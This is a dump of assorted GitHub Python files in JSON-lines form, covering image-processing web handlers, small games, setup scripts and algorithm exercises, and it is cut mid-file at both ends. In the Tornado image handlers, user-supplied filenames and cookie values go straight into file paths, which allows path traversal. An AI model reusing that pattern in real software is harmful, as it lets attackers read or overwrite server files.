min_tracking_confidence=0.8,\n)\npencil_img = cv2.imread(\"images/pencil.png\")\npencil_img = cv2.resize(pencil_img, (100, 100))\nundo_img = cv2.imread(\"images/undo.png\")\nundo_img = cv2.resize(undo_img, (100, 100))\ncancel_img = cv2.imread(\"images/cancel.png\")\ncancel_img = cv2.resize(cancel_img, (100, 100))\n\nx_offset = 500\ny_offset = 10\npencil = False\nundo = False\npoints = []\n\nclass VideoProcessor():\n def recv(self, frame):\n global pencil, undo, points \n\n image = frame.to_ndarray(format=\"bgr24\")\n\n image = cv2.flip(image, 1)\n\n results = hand_mesh.process(image)\n \n # Draw the face mesh annotations on the image.\n image.flags.writeable = True\n \n image = cv2.rectangle(image, (30, 30), (420, 420), (0, 255, 0), 3)\n image[50 : 50 + 100, x_offset : x_offset + 100] = pencil_img\n image[170 : 170 + 100, x_offset : x_offset + 100] = undo_img\n image[290 : 290 + 100, x_offset : x_offset + 100] = cancel_img\n cv2.putText(image, \"By: alizahidraja\", (250, 470), cv2.FONT_HERSHEY_PLAIN, 2, (0, 255, 0), 2)\n \n \n # Show Selected\n if pencil:\n image = cv2.rectangle(image, (500, 50), (600, 150), (0, 255, 0), 3)\n if undo:\n image = cv2.rectangle(image, (500, 170), (600, 270), (0, 255, 0), 3)\n \n # Draw dots\n for i in points:\n cv2.circle(image, i, 5, (0, 255, 0), cv2.FILLED)\n if results.multi_hand_landmarks:\n for handLms in results.multi_hand_landmarks:\n for id, lm in enumerate(handLms.landmark):\n # print(id,lm)\n h, w, c = image.shape\n cx, cy = int(lm.x * w), int(lm.y * h)\n\n if id == 4:\n tipx = cx\n tipy = cy\n\n if id == 8:\n factor = 30\n if (\n tipx >= cx - factor\n and tipx <= cx + factor\n and tipy >= cy - factor\n and tipy <= cy + factor\n ):\n a = int((tipx + cx) / 2)\n b = int((tipy + cy) / 2)\n # make dots\n if pencil and a >= 30 and a <= 420 and b >= 30 and b <= 420:\n points.append((a, b))\n\n # pencil\n elif a >= 500 and a <= 600 and b >= 50 and b <= 150:\n pencil = True\n undo = False\n\n # undo\n elif a >= 500 and a <= 600 and b >= 170 and b <= 270:\n pencil = False\n undo = True\n if len(points) > 0:\n points.pop()\n\n # cancel\n elif a >= 500 and a <= 600 and b >= 290 and b <= 390:\n pencil = False\n undo = False\n points = []\n #if id ==0:\n # cv2.circle(image, (cx, cy), 3, (255, 0, 255), cv2.FILLED)\n\n #mpDraw.draw_landmarks(image, handLms, mp.solutions.hands.HAND_CONNECTIONS)\n return av.VideoFrame.from_ndarray(image, format=\"bgr24\")\n\n\nwebrtc_ctx = webrtc_streamer(\n key=\"WYH\",\n mode=WebRtcMode.SENDRECV,\n rtc_configuration=RTC_CONFIGURATION,\n media_stream_constraints={\"video\": True, \"audio\": False},\n video_processor_factory=VideoProcessor,\n async_processing=True,\n)\n \n","repo_name":"alizahidraja/hand-paint","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"40676849273","text":"#!/usr/bin/env python\n# -*-coding:utf-8-*-\nimport sys\nimport uuid\nimport markdown\nimport os.path\nimport re\nimport torndb\nimport tornado.auth\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport tornado.websocket\nfrom tornado.options import define, options\nimport cv2\nfrom tornado import websocket, web, ioloop\nimport numpy as np\nfrom login import BaseHandler\n\n\nclass AddImageHandler(BaseHandler):\n def get(self):\n self.usercheck()\n self.write('''\n \n Upload File\n \n \n
\n \n \n \n \n ''')\n\n def post(self):\n #文件的暂存路径\n upload_path=os.path.join(os.path.dirname(__file__),'../image/userimage/') \n #提取表单中‘name’为‘file’的文件元数据\n file_metas=self.request.files['file'] \n for meta in file_metas:\n filename=meta['filename']\n kind=filename.split('.')[-1]\n imagekind=['bmp','jpg','tiff','gif','svg']\n if kind not in imagekind:\n self.write(\"not a image\")\n else:\n filepath=os.path.join(upload_path,filename)\n #有些文件需要已二进制的形式存储,实际中可以更改\n with open(filepath,'wb') as up: \n up.write(meta['body'])\n self.write('finished!')\n\nclass DownloadTmpImageHandler(tornado.web.RequestHandler):\n def get(self):\n key=self.get_cookie(\"key\")\n imagename=key+'.jpg'\n self.set_header('Content-Type', 'application/octet-stream')\n self.set_header('Content-Disposition', 'attachment; filename=' + imagename)\n data = open(\"./image/tmpimage/\"+imagename, 'rb')\n self.write(data.read())\n self.finish()\n return\n\nclass UploadImageHandler(BaseHandler):\n def get(self):\n self.usercheck()\n self.render('image/uploadimage.html')\n def post(self):\n #文件的暂存路径\n upload_path=os.path.join(os.path.dirname(__file__),'../image/userimage/') \n #提取表单中‘name’为‘file’的文件元数据\n if 'file' in self.request.files:\n file_metas=self.request.files['file'] \n for meta in file_metas:\n filename=meta['filename']\n kind=filename.split('.')[-1]\n #imagekind=['bmp','jpg','tiff','gif','svg']\n imagekind=['jpg']\n if kind not in imagekind:\n self.write(\"not a image\")\n else:\n key=self.get_cookie(\"key\")\n imagename=key+'.'+kind\n filepath=os.path.join(upload_path,imagename)\n #有些文件需要已二进制的形式存储,实际中可以更改\n with open(filepath,'wb') as up: \n up.write(meta['body'])\n imagename=key+'.'+kind\n upload_path=os.path.join(os.path.dirname(__file__),'../image/tmpimage/')\n filepath=os.path.join(upload_path,imagename)\n #有些文件需要已二进制的形式存储,实际中可以更改\n with open(filepath,'wb') as up: \n up.write(meta['body'])\n self.redirect('/imageprocess')\n\nclass NowImageHandler(BaseHandler):\n def get(self):\n self.usercheck()\n key=self.get_cookie(\"key\")\n imagename=key+'.jpg'\n data = open(\"./image/userimage/\"+imagename, 'rb').read()\n self.set_header('Content-Type', 'image/jpeg')\n self.set_header('Content-Length', len(data))\n self.write(data)\n return\n\nclass TmpImageHandler(BaseHandler):\n def get(self):\n self.usercheck()\n key=self.get_cookie(\"key\")\n imagename=key+'.jpg'\n data = open(\"./image/tmpimage/\"+imagename, 'rb').read()\n self.set_header('Content-Type', 'image/jpeg')\n self.set_header('Content-Length', len(data))\n self.write(data)\n return\n\nclass ProcessImageHandler(BaseHandler):\n def get(self):\n self.usercheck()\n self.render('image/processimage.html')\n\n\n\nclass ResetImageHandler(tornado.web.RequestHandler):\n def get(self):\n self.process()\n self.redirect('/imageprocess')\n \n def process(self):\n key=self.get_cookie(\"key\")\n imagename=key+'.jpg'\n openname=\"./image/userimage/\"+imagename\n img=cv2.imread(openname)\n wirtename=\"./image/tmpimage/\"+imagename\n cv2.imwrite(wirtename,img) \n\nclass ColorBlackWhiteHandler(tornado.web.RequestHandler):\n def get(self):\n self.process()\n self.redirect('/imageprocess')\n \n def process(self):\n key=self.get_cookie(\"key\")\n imagename=key+'.jpg'\n openname=\"./image/userimage/\"+imagename\n img=cv2.imread(openname,0)\n wirtename=\"./image/tmpimage/\"+imagename\n cv2.imwrite(wirtename,img) \n","repo_name":"rinetd/ImageOnline","sub_path":"A/handler/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"72071259628","text":"import ppb\nfrom ppb.features import loadingscene\nfrom ppb_mutant import Emoji\nimport bearmote\n\n\nclass LoadingScene(loadingscene.BaseLoadingScene):\n loading_icon = Emoji('bear')\n\n rotation_speed = 360 / 10\n\n def __init__(self, **props):\n super().__init__(**props)\n self.spinner = ppb.Sprite(image=self.loading_icon)\n self.add(self.spinner)\n\n def on_update(self, event, signal):\n self.spinner.rotation += self.rotation_speed * event.time_delta\n\n\nclass ConnectScene(bearmote.ConnectScene):\n background = 0, 0, 0\n connect_icon = Emoji('signal')\n\n def __init__(self, **props):\n super().__init__(**props)\n self.add(ppb.Sprite(image=self.connect_icon, size=3))\n\n def on_wiimote_connected(self, event, signal):\n signal(bearmote.SetWiimoteLed(id=event.id, leds={bearmote.Led1}))\n super().on_wiimote_connected(event, signal)\n\n\nclass PlayerSprite(ppb.Sprite):\n image = Emoji('bear')\n size = 1\n velocity = ppb.Vector(0, 0)\n\n BUTTONS = {\n bearmote.Right: ppb.Vector(1, 0),\n bearmote.Up: ppb.Vector(0, 1),\n bearmote.Left: ppb.Vector(-1, 0),\n bearmote.Down: ppb.Vector(0, -1),\n }\n\n def on_wiimote_button_pressed(self, event, signal):\n if event.button == bearmote.B:\n self.size *= 2\n elif event.button == bearmote.Home:\n signal(ppb.events.StopScene())\n elif event.button in self.BUTTONS:\n self.velocity += self.BUTTONS[event.button]\n\n def on_wiimote_button_released(self, event, signal):\n if event.button == bearmote.B:\n self.size /= 2\n elif event.button in self.BUTTONS:\n self.velocity -= self.BUTTONS[event.button]\n\n def on_update(self, event, signal):\n self.position += self.velocity * event.time_delta\n\n\nclass MainGame(ppb.BaseScene):\n def __init__(self, **props):\n super().__init__(**props)\n self.main_camera.pixel_ratio = 128\n self.add(PlayerSprite())\n\n def on_scene_started(self, event, signal):\n signal(ppb.events.StartScene(new_scene=ConnectScene))\n\n\nppb.run(\n starting_scene=LoadingScene, scene_kwargs={'next_scene': MainGame},\n resolution=(1900, 1080),\n systems=[bearmote.WiimoteSystem],\n)\n","repo_name":"AstraLuma/ppb-wiimote","sub_path":"bearmote/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12536078696","text":"from django.core.mail import send_mail\n\n\ndef send_confirmation_email(user, code):\n send_mail(\n 'Здравствуйте, активируйте ваш аккаунт!',\n f'Что активировать ваш аккаунт нужно ввести код:'\n f'\\n{code}'\n f'\\nне передавайте этот код никому!',\n 'johnsnowtest73@gmail.com',\n [user],\n fail_silently=False,\n )\n","repo_name":"SanzharShadybekov/py.26_shopApi","sub_path":"account/send_mail.py","file_name":"send_mail.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34020759063","text":"from __future__ import annotations\n\nfrom l5r_auto.clans import CrabClan\nfrom l5r_auto.legality import ModernEdition, TwentyFestivalsEdition\n\nfrom ..common import Stronghold\n\n\"Battle: Straighten your target opposed Personality. Straighten his attachments if your army has fewer units than the opposing army.
(When going second, you get +2PS and your Stronghold ability gains Tireless)\"\nThe_Unassailable_Fortress_of_the_Crab = Stronghold(\n card_id=12257,\n title=\"The Unassailable Fortress of the Crab\",\n gold_production=\"4\",\n starting_family_honor=3,\n province_strength=7,\n clan=[CrabClan],\n traits=[],\n abilities=[],\n legality=[TwentyFestivalsEdition, ModernEdition],\n)\n","repo_name":"aubustou/l5r","sub_path":"l5r_auto/cards/strongholds/crab/twenty_festivals.py","file_name":"twenty_festivals.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28050193710","text":"from Cython.Build import cythonize\nimport os\nimport shutil\nfrom setuptools import Extension, find_packages, setup\n\n\n# MODIFY HERE\nPACKAGE_NAME = 'package_name'\nVERSION = '0.0.1'\nINSTALL_REQUIRES = [\n 'setuptools >= 3'\n]\nDESCRIPTION = 'This package ....'\nAUTHOR = 'Yonder s.r.l.'\nLICENSE = 'Copyright 2017 Yonder srl. All Rights Reserved.'\n#\n\n\ndef build_package_tree_structure(src_dir, dst_dir):\n package_tree_structure = [src_dir]\n\n if not os.access(dst_dir, os.F_OK):\n os.mkdir(dst_dir)\n\n for filename in os.listdir(src_dir):\n source = os.path.join(src_dir, filename)\n destination = os.path.join(dst_dir, filename)\n if filename in bare_copy_file_list:\n shutil.copyfile(source, destination)\n if os.path.isdir(source):\n package_tree_structure += \\\n build_package_tree_structure(source, destination)\n if filename not in bare_copy_file_list and filename.endswith('.py'):\n shutil.copyfile(\n source, os.path.join(dst_dir, filename.replace('.py', '.pyx')))\n\n return package_tree_structure\n\n\ndef build_extensions(dst_dir):\n extensions = []\n for filename in os.listdir(dst_dir):\n destination = os.path.join(dst_dir, filename)\n if os.path.isdir(destination):\n extensions += build_extensions(destination)\n if filename.endswith('.pyx'):\n extensions += [Extension(\n str(os.path.join(dst_dir, filename.split('.')[0])),\n [destination]\n )]\n return extensions\n\n\ndef find_and_build_package_list():\n return [package.replace('.', '/') for package in find_packages()]\n\n\nbare_copy_file_list = ['__init__.py']\nsource_base_dir = os.path.join('../', PACKAGE_NAME.split('.')[0])\ndest_base_dir = os.path.join('./', PACKAGE_NAME.split('.')[0])\n\n\n_ = build_package_tree_structure(source_base_dir, dest_base_dir)\n\n\nextensions = build_extensions(dest_base_dir)\n\n\nsetup(\n name=PACKAGE_NAME,\n version=VERSION,\n description=DESCRIPTION,\n author=AUTHOR,\n license=LICENSE,\n package_dir={PACKAGE_NAME: PACKAGE_NAME},\n packages=find_and_build_package_list(),\n ext_modules=cythonize(extensions),\n)\n","repo_name":"yonderlabs/setup.py","sub_path":"deploy/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21493014800","text":"import pymysql\nfrom abc import ABC, abstractmethod\n\nfrom Previous import Projects as da\nfrom Previous.Projects import BaseDataObject as BaseDataObject\n\n\nclass RDBDataObject(BaseDataObject):\n\n\n @classmethod\n @abstractmethod\n def _get_table_info(cls):\n pass\n\n @classmethod\n @abstractmethod\n def get_table_name(cls):\n pass\n\n @classmethod\n def get_schema_info(cls):\n t_name = cls.get_table_name()\n q = \"describe \" + t_name\n res, data = da.run_q(q)\n return data\n\n @classmethod\n def get_primary_key_columns(cls):\n t_name = cls.get_table_name()\n q = 'show keys from ' + t_name + ' where key_name=\"PRIMARY\" '\n res, d = da.run_q(q)\n\n if d is not None and len(d) > 0:\n d = sorted(d, key=lambda i: i['Seq_in_index'])\n result = []\n\n for r in d:\n result.append(r['Column_name'])\n else:\n raise ValueError(\"Table does not have a primary key.\")\n\n return result\n\n @classmethod\n def insert(cls, data):\n t_info = cls._get_table_info()\n t_name = t_info['table_name']\n q, args = da.create_insert(t_name, data)\n res, data = da.run_q(q,args)\n return res\n\n @classmethod\n def retrieve(cls, template, fields=None, limit=None, offset=None, orderby=None):\n t_name = cls.get_table_name()\n sql, args = da.create_select(t_name, template=template,\n fields=fields)\n res, d = da.run_q(sql, args=args, fetch=True)\n return d\n\n @classmethod\n def retrieve_by_key(cls, key_fields, fields):\n t_name = cls.get_table_name()\n kcs = cls.get_primary_key_columns()\n tmp = dict(zip(kcs, key_fields))\n sql, args = da.create_select(t_name, template=tmp,\n fields=fields)\n res, d = da.run_q(sql, args=args, fetch=True)\n return d\n","repo_name":"donald-f-ferguson/E6156-Microservices-Cloud-Native-Applications","sub_path":"Previous/Projects/EB/DataAccess/RDBDataObject.py","file_name":"RDBDataObject.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"5286249008","text":"# Krzysztof Solecki\n\"\"\"\nAlgorytm szuka cyklu Hamiltona w zadanym grafie i jeśli istnieje to zwraca kolejność wierzchołków (miast) na ścieżce cyklu.\nW tym celu wykonuje algorytm DFS z wierzchołka 0 i bramy północnej (wybór początkowej bramy i wierzchołka nie ma znaczenia dla wyniku algorytmu,\nponieważ graf jest nieskierowany oraz jeśli istnieje cykl Hamiltona, przechodzący przez każdy wierzchołek i każdą bramę dokładnie raz to jest on osiągalny z każdego punktu startowgo).\nPrzy odwiedzaniu wierzchołka wrzucam go na stos i sprawdzam czy wielkość stosu jest równa ilości wierzchołków oraz czy z ostatniego odwiedzonego wierzchołka\nistnieje krawędź do wierzchołka 0 i bramy północnej. Jeśli tak to zwracam wynik jeśli nie to kontynuuje algorytm.\nZłożoność czasowa: O(V!) - mogę wielokrotnie odwiedzać ten sam wierzchołek\nZłożoność pamięciowa: O(V)\n\"\"\"\n\nfrom zad7testy import runtests\n\n\ndef DFS(G, s, src_side):\n n = len(G)\n visited = [False for _ in range(n)]\n\n def DFS_visit(u, stack, side, stack_len):\n nonlocal G, n, visited, s, src_side\n stack.append(u)\n stack_len += 1\n\n if stack_len == n:\n for v in G[u][1 - side]:\n if v == s and u in G[s][src_side]:\n return stack\n else:\n visited[u] = True\n\n for v in G[u][1 - side]:\n if not visited[v]:\n if u in G[v][side]:\n res = DFS_visit(v, stack, side, stack_len)\n else:\n res = DFS_visit(v, stack, 1 - side, stack_len)\n if res is not None:\n return res\n\n visited[u] = False\n stack.pop()\n stack_len -= 1\n return None\n\n return DFS_visit(s, [], src_side, 0)\n\n\ndef droga(G):\n return DFS(G, 0, 0)\n\n\n# zmien all_tests na True zeby uruchomic wszystkie testy\nruntests(droga, all_tests=True)\n","repo_name":"krzychsol/Algorithms-and-Data-Structures","sub_path":"Offline/off7/zad7.py","file_name":"zad7.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43285129823","text":"from keras.losses import mean_absolute_error\nimport keras.backend as K\n\n\ndef ssim(x, y):\n c1 = 0.01 ** 2\n\n c2 = 0.03 ** 2\n\n mu_x = K.mean(x, axis=-1)\n\n mu_y = K.mean(y, axis=-1)\n\n sigma_x = K.mean(x ** 2, axis=-1) - mu_x ** 2\n\n sigma_y = K.mean(y ** 2, axis=-1) - mu_y ** 2\n\n sigma_xy = K.mean(x * y, axis=-1) - mu_x * mu_y\n\n ssim_n = (2 * mu_x * mu_y + c1) * (2 * sigma_xy + c2)\n\n ssim_d = (mu_x ** 2 + mu_y ** 2 + c1) * (sigma_x + sigma_y + c2)\n\n ssim_out = ssim_n / ssim_d\n\n return K.clip((1 - ssim_out) / 2, 0, 1)\n\n\ndef photometric_consistency_loss(alpha):\n def loss(y_true, y_pred):\n return alpha * ssim(y_true, y_pred) + (1 - alpha) * mean_absolute_error(y_true, y_pred)\n\n return loss\n","repo_name":"maj-personal-repos/UnDeepVO","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"37"} +{"seq_id":"36340776394","text":"#// https://docs.python.org/3.6/tutorial/datastructures.html#nested-list-comprehensions\n\n\nmatrix = [\n [1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12],\n]\n\n[[row[i] for row in matrix] for i in range(4)]\n\nlist(zip(*matrix))\n\n\n","repo_name":"yangsg/linux_training_notes","sub_path":"python3/basic02_syntax/datatype_list.py.demo/nested-list-comprehensions.py","file_name":"nested-list-comprehensions.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29838828511","text":"from sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n# Split the data into training and testing sets\r\nX = sales_data.drop(['sales', 'date'], axis=1)\r\ny = sales_data['sales']\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\r\n\r\n# Train and evaluate models\r\nlinear_reg_model = LinearRegression()\r\nlinear_reg_model.fit(X_train, y_train)\r\nlinear_reg_pred = linear_reg_model.predict(X_test)\r\nlinear_reg_rmse = mean_squared_error(y_test, linear_reg_pred, squared=False)\r\n\r\nrandom_forest_model = RandomForestRegressor()\r\nrandom_forest_model.fit(X_train, y_train)\r\nrandom_forest_pred = random_forest_model.predict(X_test)\r\nrandom_forest_rmse = mean_squared_error(y_test, random_forest_pred, squared=False)\r\n","repo_name":"abinash0509/Oibsip_Taskno-Data-Science","sub_path":"Sales Predict/model selection.py","file_name":"model selection.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22302906553","text":"#writeexcel.py\r\nfrom openpyxl import Workbook\r\n\r\nexcelfile = Workbook() #สร้างไฟล์ excel ใน python\r\n\r\nsheet = excelfile.active #เลือก worksheet ที่กำลังเปิดอยู่\r\n\r\nsheet['C3'] = 'Hello'\r\n\r\nsheet.cell(row=3,column=4).value = 'world'\r\n\r\n#data = ['Uncle',100,'100']\r\n#sheet.append(data)\r\n\r\nexcelfile.save('Result.xlsx')\r\nprint('Done!')\r\n\r\n","repo_name":"UncleEngineer/python-excel","sub_path":"writeexcel.py","file_name":"writeexcel.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"th","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"20386359662","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nINF = int(1e9)\r\n\r\n#n은 도시의개수 m은 노선의 갯수\r\nn,m = map(int, input().split())\r\n\r\nedges = []\r\n\r\ndistance = [INF] * (n+1)\r\n\r\nfor _ in range(m) :\r\n a, b, c = map(int, input().split())\r\n edges.append((a,b,c))\r\n\r\ndef bellmanFord(start) :\r\n distance[start] = 0\r\n \r\n for i in range(n) :\r\n for cur,nextNode,cost in edges :\r\n if distance[cur] != INF and distance[nextNode] > distance[cur] + cost :\r\n distance[nextNode] = distance[cur] + cost\r\n if i == n-1 :\r\n return True\r\n return False\r\n\r\nstartNode = 1\r\n\r\nnegative_cycle = bellmanFord(startNode) \r\n\r\n\r\n\r\nif negative_cycle :\r\n print('-1')\r\nelse : \r\n for i in range(startNode+1,len(distance),1) :\r\n if distance[i] == INF :\r\n print('-1')\r\n else :\r\n print(distance[i])\r\n\r\n\r\n\r\n","repo_name":"yundevingV/Algorithm_","sub_path":"백준/Gold/11657. 타임머신/타임머신.py","file_name":"타임머신.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24360831971","text":"# 백준 알파벳 다이아몬드 https://www.acmicpc.net/problem/1262\n\nimport sys\nimport string\n\ndef distance(r,c,center_r, center_c) :\n return abs(r-center_r) + abs(c-center_c)\n\nn,r1,c1,r2,c2 = map(int,sys.stdin.readline().split(' '))\nalpha = string.ascii_lowercase\n\nr,c = n-1,n-1\nfor i in range(r1,r2+1) :\n tmp_str = ''\n for j in range(c1,c2+1):\n dstns = distance(i%(2*n-1),j%(2*n-1),r,c)\n tmp_str += alpha[dstns%26] if dstns < n else '.'\n print(tmp_str)\n","repo_name":"csw180/coding_py","sub_path":"boj_1262.py","file_name":"boj_1262.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74861716587","text":"\"\"\"\nhttps://practice.geeksforgeeks.org/problems/finding-middle-element-in-a-linked-list/1#\n\"\"\"\n\n#Approach 1\n\n\"\"\"\nTraverse the whole linked list and count the no. of nodes. Now traverse the list again till count/2 and return the node at count/2. \n\"\"\"\n\n#Approach 2\n#TC:O(n)\n#SC:O(1)\ndef findMid(head):\n slow = head\n fast = head\n \n while fast and fast.next :\n slow = slow.next\n fast = fast.next.next\n return slow.data\n","repo_name":"DIVYANSHU-CHAUDHARI/DSA-Library","sub_path":"LinkedList/Find Middle element.py","file_name":"Find Middle element.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39672451844","text":"#!/usr/bin/env python\n\n\"\"\"This is an example script that can be used to set on and off timers based on the sunrise/sunset times.\n\nSpecifically, it will set times on an outside porch light\nto turn on at dusk and off at dawn. It will set the timers for\ninside light to turn on at sunset, and off at a fixed time.\n\nA script like this is best used with an /etc/crontab entry that might\nrun every day or every few days. For example:\n-----------------\n\n# Sync up the bulb clocks a few times a day, in case of manual power toggles\n00 3,12,17,22 * * * username /path/to/scripts/flux_led.py -Ss --setclock\n\n# Set the sun timers everyday at 3am\n00 3 * * * username /path/to/scripts/sun_timers.py\n\n\n-----------------\n\nThe python file with the Flux LED wrapper classes should live in\nthe same folder as this script\n\"\"\"\nimport datetime\nimport os\nimport sys\nimport syslog\n\nfrom flux_led import BulbScanner, LedTimer, WifiLedBulb\n\ntry:\n from astral import Astral\nexcept ImportError:\n print(\"Error: Need to install python package: astral\")\n sys.exit(-1)\n\n\nthis_folder = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(this_folder)\n\ndebug = False\n\n\ndef main():\n syslog.openlog(sys.argv[0])\n\n # Change location to nearest city.\n location = \"San Diego\"\n\n # Get the local sunset/sunrise times\n a = Astral()\n a.solar_depression = \"civil\"\n city = a[location]\n timezone = city.timezone\n sun = city.sun(date=datetime.datetime.now(), local=True)\n\n if debug:\n print(f\"Information for {location}/{city.region}\\n\")\n print(f\"Timezone: {timezone}\")\n\n print(\n \"Latitude: {:.02f}; Longitude: {:.02f}\\n\".format(\n city.latitude, city.longitude\n )\n )\n\n print(\"Dawn: {}\".format(sun[\"dawn\"]))\n print(\"Sunrise: {}\".format(sun[\"sunrise\"]))\n print(\"Noon: {}\".format(sun[\"noon\"]))\n print(\"Sunset: {}\".format(sun[\"sunset\"]))\n print(\"Dusk: {}\".format(sun[\"dusk\"]))\n\n # Find the bulbs on the LAN\n scanner = BulbScanner()\n scanner.scan(timeout=4)\n\n # Specific ID/MAC of the bulbs to set\n porch_info = scanner.getBulbInfoByID(\"ACCF235FFFEE\")\n livingroom_info = scanner.getBulbInfoByID(\"ACCF235FFFAA\")\n\n if porch_info:\n bulb = WifiLedBulb(porch_info[\"ipaddr\"])\n bulb.refreshState()\n\n timers = bulb.getTimers()\n\n # Set the porch bulb to turn on at dusk using timer idx 0\n syslog.syslog(\n syslog.LOG_ALERT,\n \"Setting porch light to turn on at {}:{:02d}\".format(\n sun[\"dusk\"].hour, sun[\"dusk\"].minute\n ),\n )\n dusk_timer = LedTimer()\n dusk_timer.setActive(True)\n dusk_timer.setRepeatMask(LedTimer.Everyday)\n dusk_timer.setModeWarmWhite(35)\n dusk_timer.setTime(sun[\"dusk\"].hour, sun[\"dusk\"].minute)\n timers[0] = dusk_timer\n\n # Set the porch bulb to turn off at dawn using timer idx 1\n syslog.syslog(\n syslog.LOG_ALERT,\n \"Setting porch light to turn off at {}:{:02d}\".format(\n sun[\"dawn\"].hour, sun[\"dawn\"].minute\n ),\n )\n dawn_timer = LedTimer()\n dawn_timer.setActive(True)\n dawn_timer.setRepeatMask(LedTimer.Everyday)\n dawn_timer.setModeTurnOff()\n dawn_timer.setTime(sun[\"dawn\"].hour, sun[\"dawn\"].minute)\n timers[1] = dawn_timer\n\n bulb.sendTimers(timers)\n\n else:\n print(\"Can't find porch bulb\")\n\n if livingroom_info:\n bulb = WifiLedBulb(livingroom_info[\"ipaddr\"])\n bulb.refreshState()\n\n timers = bulb.getTimers()\n\n # Set the living room bulb to turn on at sunset using timer idx 0\n syslog.syslog(\n syslog.LOG_ALERT,\n \"Setting LR light to turn on at {}:{:02d}\".format(\n sun[\"sunset\"].hour, sun[\"sunset\"].minute\n ),\n )\n sunset_timer = LedTimer()\n sunset_timer.setActive(True)\n sunset_timer.setRepeatMask(LedTimer.Everyday)\n sunset_timer.setModeWarmWhite(50)\n sunset_timer.setTime(sun[\"sunset\"].hour, sun[\"sunset\"].minute)\n timers[0] = sunset_timer\n\n # Set the living room bulb to turn off at a fixed time\n off_timer = LedTimer()\n off_timer.setActive(True)\n off_timer.setRepeatMask(LedTimer.Everyday)\n off_timer.setModeTurnOff()\n off_timer.setTime(23, 30)\n timers[1] = off_timer\n\n bulb.sendTimers(timers)\n else:\n print(\"Can't find living room bulb\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Danielhiversen/flux_led","sub_path":"examples/sun_timers_example.py","file_name":"sun_timers_example.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"37"} +{"seq_id":"32900484445","text":"import os\r\nimport subprocess\r\nfrom connectFunction import *\r\nglobal lastlayer\r\n\r\n\r\ndef residualBlock(file,filters):\r\n global lastLayer\r\n lasto=getLastlayer()\r\n \r\n addconv2d(file,0,filters,3,3,1,1,1)\r\n addBatchNorm(file,0,0.999,0.000011)\r\n addrelu(file,0)\r\n addconv2d(file,0,filters,3,3,1,1,1)\r\n addBatchNorm(file,0,0.999,0.000011)\r\n addAdd(file,lasto-getLastlayer())\r\n addrelu(file,0)\r\n \r\ndef residualBlockFirst(file,filters,strides):\r\n global lastLayer\r\n addconv2d(file,0,filters,3,3,strides,1,1)\r\n lasto=lastlayer\r\n addBatchNorm(file,0,0.999,0.000011)\r\n addrelu(file,0)\r\n addconv2d(file,0,filters,3,3,1,1,1)\r\n addBatchNorm(file,0,0.999,0.000011)\r\n addAdd(file,lasto-lastlayer)\r\n addrelu(file,0)\r\ndef createNN(file,out):\r\n filters = [64, 64, 128, 256, 512]\r\n kernels = [7, 3, 3, 3, 3]\r\n strides = [2, 1, 2, 2, 2]\r\n \r\n addconv2d(file,0,filters[0],kernels[0],kernels[0],strides[0],3,1)\r\n addBatchNorm(file,0,0.999,0.000011)\r\n addrelu(file,0)\r\n addpoolmax(file,0,3,2,1)\r\n \r\n residualBlock(file,filters[0])\r\n residualBlock(file,filters[0])\r\n residualBlockFirst(file,filters[2],strides[2])\r\n residualBlock(file,filters[2])\r\n residualBlockFirst(file,filters[3],strides[3])\r\n residualBlock(file,filters[3])\r\n residualBlockFirst(file,filters[4],strides[4])\r\n residualBlock(file,filters[4])\r\n adddropout(file,0,0.5)\r\n addFully(file,0,500)\r\n addrelu(file,0)\r\n addEnd(file,out)\r\n \r\ndef 